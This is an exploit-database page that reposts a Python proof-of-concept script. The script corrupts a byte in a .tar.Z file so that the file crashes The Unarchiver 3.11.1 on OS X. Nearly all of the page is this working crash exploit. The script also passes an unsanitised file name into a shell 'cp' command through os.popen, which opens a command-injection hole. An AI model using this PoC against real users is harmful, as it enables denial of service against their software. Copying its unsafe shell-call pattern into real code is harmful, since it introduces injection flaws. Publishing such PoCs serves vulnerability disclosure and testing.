Home / os / wince

The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC

Posted on 30 November -0001

<HTML><HEAD><TITLE>The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY># Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC # Date: 10-17-2016 # Exploit Author: Antonio Z. # Vendor Homepage: http://unarchiver.c3.cx/unarchiver # Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip # Version: 3.11.1 # Tested on: OS X 10.10, OS X 10.11, OS X 10.12 # More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h import os, struct, sys from mmap import mmap if len(sys.argv) <= 1: print "Usage: python Local_Crash_PoC.py [file name]" exit() file_name = sys.argv[1] file_mod = open(file_name, 'r+b') file_hash = file_mod.read() def get_extension(file_name): basename = os.path.basename(file_name) extension = '.'.join(basename.split('.')[1:]) return '.' + extension if extension else None def file_maping(): maping = mmap(file_mod.fileno(),0) maping.seek(2) maping.write_byte(struct.pack('B', 255)) maping.close() new_file_name = "Local_Crash_PoC" + get_extension(file_name) os.popen('cp ' + file_name + ' ' + new_file_name) file_mod = open(new_file_name, 'r+b') file_maping() file_mod.close() print '[+] ' + 'Created file: ' + new_file_name </BODY></HTML>

 

TOP